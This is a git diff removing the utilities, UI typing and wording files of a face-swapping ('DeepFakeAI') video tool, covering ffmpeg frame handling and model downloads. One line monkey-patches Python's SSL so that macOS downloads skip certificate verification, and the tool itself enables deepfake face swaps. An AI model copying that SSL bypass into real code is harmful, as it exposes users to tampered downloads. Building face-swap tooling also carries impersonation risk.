execution.listen() - settings.listen() - temp_frame.listen() - source.listen() - target.listen() - #preview.listen() - trim_frame.listen() - face_selector.listen() - face_analyser.listen() - output_settings.listen() - output.listen() diff --git a/DeepFakeAI/uis/typing.py b/DeepFakeAI/uis/typing.py deleted file mode 100644 index 4abe384f07c4b90504e47291674905f85a5b8f52..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/typing.py +++ /dev/null @@ -1,18 +0,0 @@ -from typing import Literal, Dict, Any -import gradio - -Component = gradio.File or gradio.Image or gradio.Video or gradio.Slider -ComponentName = Literal\ -[ - 'source_file', - 'target_file', - 'preview_frame_slider', - 'face_recognition_dropdown', - 'reference_face_position_gallery', - 'reference_face_distance_slider', - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown', - 'frame_processors_checkbox_group' -] -Update = Dict[Any, Any] diff --git a/DeepFakeAI/utilities.py b/DeepFakeAI/utilities.py deleted file mode 100644 index dd33cf157f684dc1bad324bca4d9326b8e3f82f2..0000000000000000000000000000000000000000 --- a/DeepFakeAI/utilities.py +++ /dev/null @@ -1,190 +0,0 @@ -import glob -import mimetypes -import os -import platform -import shutil -import ssl -import subprocess -import tempfile -import urllib -from pathlib import Path -from typing import List, Optional - -import onnxruntime -from tqdm import tqdm - -import DeepFakeAI.globals -from DeepFakeAI import wording - -TEMP_DIRECTORY_PATH = os.path.join(tempfile.gettempdir(), 'DeepFakeAI') -TEMP_OUTPUT_NAME = 'temp.mp4' - -# monkey patch ssl -if platform.system().lower() == 'darwin': - ssl._create_default_https_context = ssl._create_unverified_context - - -def run_ffmpeg(args : List[str]) -> bool: - commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] - commands.extend(args) - try: - subprocess.check_output(commands, stderr = subprocess.STDOUT) - return True - except subprocess.CalledProcessError: - return False - - -def detect_fps(target_path : str) -> Optional[float]: - commands = [ 'ffprobe', '-v', 'error', '-select_streams', 'v:0', '-show_entries', 'stream=r_frame_rate', '-of', 'default=noprint_wrappers = 1:nokey = 1', target_path ] - output = subprocess.check_output(commands).decode().strip().split('/') - try: - numerator, denominator = map(int, output) - return numerator / denominator - except (ValueError, ZeroDivisionError): - return None - - -def extract_frames(target_path : str, fps : float) -> bool: - temp_directory_path = get_temp_directory_path(target_path) - temp_frame_quality = round(31 - (DeepFakeAI.globals.temp_frame_quality * 0.31)) - trim_frame_start = DeepFakeAI.globals.trim_frame_start - trim_frame_end = DeepFakeAI.globals.trim_frame_end - commands = [ '-hwaccel', 'auto', '-i', target_path, '-q:v', str(temp_frame_quality), '-pix_fmt', 'rgb24', ] - if trim_frame_start is not None and trim_frame_end is not None: - commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ':end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) - elif trim_frame_start is not None: - commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(fps) ]) - elif trim_frame_end is not None: - commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(fps) ]) - else: - commands.extend([ '-vf', 'fps=' + str(fps) ]) - commands.extend([os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format)]) - return run_ffmpeg(commands) - - -def create_video(target_path : str, fps : float) -> bool: - temp_output_path = get_temp_output_path(target_path) - temp_directory_path = get_temp_directory_path(target_path) - output_video_quality = round(51 - (DeepFakeAI.globals.output_video_quality * 0.5)) - commands = [ '-hwaccel', 'auto', '-r', str(fps), '-i', os.path.join(temp_directory_path, '%04d.' + DeepFakeAI.globals.temp_frame_format), '-c:v', DeepFakeAI.globals.output_video_encoder ] - if DeepFakeAI.globals.output_video_encoder in [ 'libx264', 'libx265', 'libvpx' ]: - commands.extend([ '-crf', str(output_video_quality) ]) - if DeepFakeAI.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: - commands.extend([ '-cq', str(output_video_quality) ]) - commands.extend([ '-pix_fmt', 'yuv420p', '-vf', 'colorspace=bt709:iall=bt601-6-625', '-y', temp_output_path ]) - return run_ffmpeg(commands) - - -def restore_audio(target_path : str, output_path : str) -> None: - fps = detect_fps(target_path) - trim_frame_start = DeepFakeAI.globals.trim_frame_start - trim_frame_end = DeepFakeAI.globals.trim_frame_end - temp_output_path = get_temp_output_path(target_path) - commands = [ '-hwaccel', 'auto', '-i', temp_output_path, '-i', target_path ] - if trim_frame_start is None and trim_frame_end is None: - commands.extend([ '-c:a', 'copy' ]) - else: - if trim_frame_start is not None: - start_time = trim_frame_start / fps - commands.extend([ '-ss', str(start_time) ]) - else: - commands.extend([ '-ss', '0' ]) - if trim_frame_end is not None: - end_time = trim_frame_end / fps - commands.extend([ '-to', str(end_time) ]) - commands.extend([ '-c:a', 'aac' ]) - commands.extend([ '-map', '0:v:0', '-map', '1:a:0', '-y', output_path ]) - done = run_ffmpeg(commands) - if not done: - move_temp(target_path, output_path) - - -def get_temp_frame_paths(target_path : str) -> List[str]: - temp_directory_path = get_temp_directory_path(target_path) - return glob.glob((os.path.join(glob.escape(temp_directory_path), '*.' + DeepFakeAI.globals.temp_frame_format))) - - -def get_temp_directory_path(target_path : str) -> str: - target_name, _ = os.path.splitext(os.path.basename(target_path)) - return os.path.join(TEMP_DIRECTORY_PATH, target_name) - - -def get_temp_output_path(target_path : str) -> str: - temp_directory_path = get_temp_directory_path(target_path) - return os.path.join(temp_directory_path, TEMP_OUTPUT_NAME) - - -def normalize_output_path(source_path : str, target_path : str, output_path : str) -> Optional[str]: - if source_path and target_path and output_path: - source_name, _ = os.path.splitext(os.path.basename(source_path)) - target_name, target_extension = os.path.splitext(os.path.basename(target_path)) - if os.path.isdir(output_path): - return os.path.join(output_path, source_name + '-' + target_name + target_extension) - return output_path - - -def create_temp(target_path : str) -> None: - temp_directory_path = get_temp_directory_path(target_path) - Path(temp_directory_path).mkdir(parents = True, exist_ok = True) - - -def move_temp(target_path : str, output_path : str) -> None: - temp_output_path = get_temp_output_path(target_path) - if os.path.isfile(temp_output_path): - if os.path.isfile(output_path): - os.remove(output_path) - shutil.move(temp_output_path, output_path) - - -def clear_temp(target_path : str) -> None: - temp_directory_path = get_temp_directory_path(target_path) - parent_directory_path = os.path.dirname(temp_directory_path) - if not DeepFakeAI.globals.keep_temp and os.path.isdir(temp_directory_path): - shutil.rmtree(temp_directory_path) - if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): - os.rmdir(parent_directory_path) - - -def is_image(image_path : str) -> bool: - if image_path and os.path.isfile(image_path): - mimetype, _ = mimetypes.guess_type(image_path) - return bool(mimetype and mimetype.startswith('image/')) - return False - - -def is_video(video_path : str) -> bool: - if video_path and os.path.isfile(video_path): - mimetype, _ = mimetypes.guess_type(video_path) - return bool(mimetype and mimetype.startswith('video/')) - return False - - -def conditional_download(download_directory_path : str, urls : List[str]) -> None: - if not os.path.exists(download_directory_path): - os.makedirs(download_directory_path) - for url in urls: - download_file_path = os.path.join(download_directory_path, os.path.basename(url)) - if not os.path.exists(download_file_path): - request = urllib.request.urlopen(url) # type: ignore[attr-defined] - total = int(request.headers.get('Content-Length', 0)) - with tqdm(total = total, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024) as progress: - urllib.request.urlretrieve(url, download_file_path, reporthook = lambda count, block_size, total_size: progress.update(block_size)) # type: ignore[attr-defined] - - -def resolve_relative_path(path : str) -> str: - return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) - - -def list_module_names(path : str) -> Optional[List[str]]: - if os.path.exists(path): - files = os.listdir(path) - return [Path(file).stem for file in files if not Path(file).stem.startswith('__')] - return None - - -def encode_execution_providers(execution_providers : List[str]) -> List[str]: - return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] - - -def decode_execution_providers(execution_providers : List[str]) -> List[str]: - return [provider for provider, encoded_execution_provider in zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] diff --git a/DeepFakeAI/wording.py b/DeepFakeAI/wording.py deleted file mode 100644 index 1d70363ea7546eeb3b3ec224eb04848db727718e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/wording.py +++ /dev/null @@ -1,88 +0,0 @@ -WORDING =\ -{ - 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', - 'ffmpeg_not_installed': 'FFMpeg is not installed', - 'source_help': 'select a source image', - 'target_help': 'select a target image or video', - 'output_help': 'specify the output file or directory', - 'frame_processors_help': 'choose from the available frame processors (choices: {choices}, ...)', - 'ui_layouts_help': 'choose from the available ui layouts (choices: {choices}, ...)', - 'keep_fps_help': 'preserve the frames per second (fps) of the target', - 'keep_temp_help': 'retain temporary frames after processing', - 'skip_audio_help': 'omit audio from the target', - 'face_recognition_help': 'specify the method for face recognition', - 'face_analyser_direction_help': 'specify the direction used for face analysis', - 'face_analyser_age_help': 'specify the age used for face analysis', - 'face_analyser_gender_help': 'specify the gender used for face analysis', - 'reference_face_position_help': 'specify the position of the reference face', - 'reference_face_distance_help': 'specify the distance between the reference face and the target face', - 'reference_frame_number_help': 'specify the number of the reference frame', - 'trim_frame_start_help': 'specify the start frame for extraction', - 'trim_frame_end_help': 'specify the end frame for extraction', - 'temp_frame_format_help': 'specify the image format used for frame extraction', - 'temp_frame_quality_help': 'specify the image quality used for frame extraction', - 'output_video_encoder_help': 'specify the encoder used for the output video', - 'output_video_quality_help': 'specify the quality used for the output video', - 'max_memory_help': 'specify the maximum amount of ram to be used (in gb)', - 'execution_providers_help': 'choose from the available execution providers (choices: {choices}, ...)', - 'execution_thread_count_help': 'specify the number of execution threads', - 'execution_queue_count_help': 'specify the number of execution queries', - 'creating_temp': 'Creating temporary resources', - 'extracting_frames_fps': 'Extracting frames with {fps} FPS', - 'processing': 'Processing', - 'downloading': 'Downloading', - 'temp_frames_not_found': 'Temporary frames not found', - 'creating_video_fps': 'Creating video with {fps} FPS', - 'creating_video_failed': 'Creating video failed', - 'skipping_audio': 'Skipping audio', - 'restoring_audio': 'Restoring audio', - 'clearing_temp': 'Clearing temporary resources', - 'processing_image_succeed': 'Processing to image succeed', - 'processing_image_failed': 'Processing to image failed', - 'processing_video_succeed': 'Processing to video succeed', - 'processing_video_failed': 'Processing to video failed', - 'select_image_source': 'Select an image for source path', - 'select_image_or_video_target': 'Select an image or video for target path', - 'no_source_face_detected': 'No source face detected', - 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', - 'frame_processor_not_implemented': 'Frame processor {frame_processor} not implemented correctly', - 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', - 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', - 'start_button_label': 'START', - 'clear_button_label': 'CLEAR', - 'benchmark_result_dataframe_label': 'BENCHMARK RESULT', - 'benchmark_cycles_slider_label': 'BENCHMARK CYCLES', - 'execution_providers_checkbox_group_label': 'EXECUTION PROVIDERS', - 'execution_thread_count_slider_label': 'EXECUTION THREAD COUNT', - 'execution_queue_count_slider_label': 'EXECUTION QUEUE COUNT', - 'face_analyser_direction_dropdown_label': 'FACE ANALYSER DIRECTION', - 'face_analyser_age_dropdown_label': 'FACE ANALYSER AGE', - 'face_analyser_gender_dropdown_label': 'FACE ANALYSER GENDER', - 'reference_face_gallery_label': 'REFERENCE FACE', - 'face_recognition_dropdown_label': 'FACE RECOGNITION', - 'reference_face_distance_slider_label': 'REFERENCE FACE DISTANCE', - 'output_image_or_video_label': 'OUTPUT', - 'output_video_encoder_dropdown_label': 'OUTPUT VIDEO ENCODER', - 'output_video_quality_slider_label': 'OUTPUT VIDEO QUALITY', - 'preview_image_label': 'PREVIEW', - 'preview_frame_slider_label': 'PREVIEW FRAME', - 'frame_processors_checkbox_group_label': 'FRAME PROCESSORS', - 'keep_fps_checkbox_label': 'KEEP FPS', - 'keep_temp_checkbox_label': 'KEEP TEMP', - 'skip_audio_checkbox_label': 'SKIP AUDIO', - 'temp_frame_format_dropdown_label': 'TEMP FRAME FORMAT', - 'temp_frame_quality_slider_label': 'TEMP FRAME QUALITY', - 'trim_frame_start_slider_label': 'TRIM FRAME START', - 'trim_frame_end_slider_label': 'TRIM FRAME END', - 'source_file_label': 'SOURCE', - 'target_file_label': 'TARGET', - 'point': '.', - 'comma': ',', - 'colon': ':', - 'question_mark': '?', - 'exclamation_mark': '!' -} - - -def get(key : str) -> str: - return WORDING[key]